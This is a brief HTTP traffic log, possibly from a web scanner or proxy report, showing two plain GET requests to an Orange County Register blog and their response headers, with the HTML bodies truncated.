<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/orange-county-property/98182/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:02 +0000
Cache-Control: max-age=61, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 140260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /category/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>